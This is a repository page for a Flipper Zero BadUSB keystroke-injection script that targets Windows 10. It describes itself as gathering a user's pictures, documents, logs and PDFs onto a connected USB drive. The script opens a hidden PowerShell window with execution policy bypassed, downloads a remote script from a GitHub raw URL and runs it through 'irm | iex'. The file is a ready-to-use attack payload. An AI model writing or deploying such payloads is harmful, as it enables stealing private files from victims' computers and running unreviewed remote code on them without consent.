Files
BadUSB-Files-For-FlipperZero/Exfiltrate-to-USB/Exfiltrate-to-USB.txt
T
2023-12-29 15:23:21 +00:00

17 lines
564 B
Plaintext

REM Title: beigeworm's Exfiltrate files USB Drive
REM Author: @beigeworm
REM Description: This script searches the users folder fot pictures, documents, logs, PDFs and more, then sends its all to newly connected USB drive.
REM Target: Windows 10
REM some setup for dukie script
DEFAULT_DELAY 100
REM open powershell (remove -W Hidden to show the window)
DELAY 1000
GUI r
DELAY 750
STRING powershell -NoP -Ep Bypass -W H -C irm https://raw.githubusercontent.com/beigeworm/BadUSB-Files-For-FlipperZero/main/Exfiltrate-to-USB/main.ps1 | iex
ENTER